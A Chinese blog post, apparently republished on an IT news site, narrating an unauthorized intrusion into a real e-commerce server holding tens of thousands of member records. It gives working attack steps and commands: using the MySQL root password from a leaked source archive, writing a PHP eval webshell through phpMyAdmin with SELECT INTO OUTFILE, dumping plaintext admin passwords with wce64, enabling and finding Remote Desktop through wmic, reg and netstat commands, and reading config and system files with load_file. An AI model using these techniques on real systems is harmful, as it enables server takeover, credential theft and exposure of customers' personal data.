源代码泄露获取某电子商务网站服务器权限
源代码泄露获取某电子商务网站服务器权限
simeon
***本次目标事发偶然,通过shadon对“phpMyAdmin”关键字进行检索时,加入“indexOf”关键字后,会出现所有存在列目录漏洞的网站,该网站为电子商务网站,网站保留有数万会员真实信息,下面将整过***过程进行分享。
1.发现目标
通过shadon搜索引擎对搜索记录逐个打开,发现某目标站点存在文件目录泄露漏洞:
http://203.***.**.227/
http://203.***.**.227/www.********.hk.rar
http://203.***.**.227/phpMyAdmin/
http://203.***.**.227/news********hk/
目录还有phpinfo.php文件,看到phpMyAdmin和phpinfo.php同时存在,感觉服务器权限已经不远了,如图1所示,有网站源代码打包文件,将其下载到本地。
图1文件泄露
2.查看源代码打包文件
整个源代码压缩包2.37 GB,真大!通过搜索和查看,确定数据库配置文件为config.php
如图2所示,将其解压到本地,使用notepad进行查看,果然其中包含了数据库配置信息,而且还是root帐号,密码虽然算弱口令,但也是弱口令中的强口令。
图2寻找数据库配置文件
图3获取数据库root帐号和密码
3.寻找网站物理路径
通过phpinfo.php文件查看,在浏览器中可以使用Ctrl+F快捷键搜索关键字“SCRIPT_FILENAME”获取其真实物理路径地址,_SERVER["SCRIPT_FILENAME"] D:/WWW/phpinfo.php,如图4所示。
图4获取网站物理路劲
4.Mysql直接导出Webshell
通过获取的root帐号和密码登录http://203.***.**.227/phpMyAdmin/,成功登录,如图5所示,选择SQL查询,在其中查询select'<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'导出一句话后门。
图5登录mysql数据库
图6查询导出一句话后门
6.获取webshell
在浏览器中对http://203.***.**.227地址刷新即可获取一句话后门文件地址:http://203.***.**.227/p.php,在浏览器中打开进行访问,一切正常。使用中国菜刀一句话后门管理软件,shell添加并打开,如图7所示,顺利获取webshell
图7获取webshell
7.服务器提权
目测该系统php运行权限为系统权限,上传wce64.exe,然后在终端管理中输入“wce64-w”命令成功获取管理员帐号密码,如图8所示。
图8获取管理员密码
8.获取3389端口
在终端管理器中执行netstat -an|find "3389",无结果显示,估计管理员修改了默认端口,使用tasklist /svc命令获取进程名称和服务,找到termservice所对应的进程号,可以直接使用命令 tasklist /svc | find"termService"来获取对应的PID号,如图9所示,在本例中对应的ID号是1340。
图9获取远程终端服务对应的PID值
然后使用“netstat -ano”命令寻找1340对应的端口号,如图10所示,对应的TCP端口为7755端口,也可以使用命令netstat-ano | find '1340'命令直接显示。
图10获取终端服务对应的端口
9.登录远程终端
在命令提示符下输入mstsc.exe,打开远程终端登陆器,在3389远程桌面登录中的地址中输入“203.***.**.227:7755”,然后使用获取的管理员密码成功登录系统,如图11所示。
图11成功登录系统
10.域名反查
打开http://www.yougetsignal.com/tools/web-sites-on-web-server/网站对IP地址203.***.**.227进行域名反查,如图12所示,该IP下存在网站,打开该网站,该网站为一个电子商务网站,在该网站中存在数万会员资料,如图13所示。
图12域名反查
图13存在1万多条会员信息
11.***总结与思考
对存在phpMyAdmin的站点,通过代码泄露等方法来获取数据库的密码,然后通过读取文件或者导出文件来获取webshell。
(1)3389端口命令行下获取总结
netstat-an |find "3389" 查看3389端口是否开放
tasklist/svc | find "TermService" 获取对应TermService的PID号
netstat-ano | find '1340' 查看上面获取的PID号对应的TCP端口号
(2)Windows2008Server命令行开启3389
wmic/namespace:\\root\cimv2\terminalservices path win32_terminalservicesettingwhere (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservicespath win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') callsetuserauthenticationrequired 1
reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
(3)wce64 -w 命令直接获取系统明文登录密码
(4)在phpinfo中查找SCRIPT_FILENAME关键字获取真实路径
(5)phpmyadmin一句话后门导出
select'<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'
(6)phpstudy敏感配置文件
selectload_file(' D:\phpStudy\Lighttpd\conf\vhosts.conf ');
select load_file('D:\phpStudy\Lighttpd\conf\ lighttpd.conf ');
selectload_file(' D:\phpStudy\Apache\conf\vhosts.conf');
selectload_file(' D:\phpStudy\Apache\conf\httpd.conf');
selectload_file('c:\boot.ini');
selectload_file('c:\boot.ini');
selectload_file(' D:\phpStudy\MySQL\my.ini');
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
记一次服务器宕机处理过程
今天整理之前的运维资料,发现了自己整理的一次刀片服务器(运行的vmware虚拟化)事故处理流程,所以记录下,备忘。 一、事件处理过程 14:10接到机房运维工程师通知,Opmanager监控系统上出现了多台服务器宕机现象,并且均为虚拟机。 14:12通知机房运维工程师检查HP刀片服务器是否有告警,远程登录vcenter进行检查。远程查看发现ESX04(10.203.11.64)出现告警,告警信息如下图所示: 14:15通知工程师ESX04出现告警,然后确认该刀片服务器是否存活,并进入机房确认设备上是否有硬件上的告警。 14:16检查逻辑上的网络接口是否存在异常 如下图所示,发现有两块网卡处于离线状态 14:18检查其它刀片,发现ESXI02对应的网卡,发现为正常的 14:20登录HP刀片管理控制台查看,未发现服务器告警信息。 14:19 参照其它EXSI,尝试更改vmnic6、vmnic7两块网卡模式,该操作无法生效 更改网卡模式无法生效 14:27在ESX04进行手动迁移虚拟机到其他主机上,迁移失败。 14:58 将ESX04主机上的虚拟机全部关机 15:20 重启ESXI主机,HA...
- 下一篇
docker中遇到的问题及解决方法
docker 的深坑 1. 镜像数据问题 由于容器重启后数据会被清空,所以docker中的数据需要通过映射存放到本地磁盘持久化,启动docker镜像的时候加-V diskPath:dockerPath的参数。如: docker run -d -e MYSQL_ROOT_PASSWORD=admin --name mysql -v /opt/data/mysql:/var/lib/mysql -p 3306:3306 mysql 2. 容器中的时区与语言的问题 在docker容器中默认时间是UTC时间,北京是+8时区。默认语言为POSIX,则需在编译docker p_w_picpath的时候需要指定语言和时区的环境变量: ENV LC_ALL en_US.UTF-8,ENV TZ=Asia/Shanghai 3. docker 容器中systemctl问题 在容器中使用systemctl报Failed to get D-Bus connection: Operation not permitted的错误,则在启动的时候把sys/fs/cgroup映射到docker容器中。 docker ...
相关文章
文章评论
共有0条评论来说两句吧...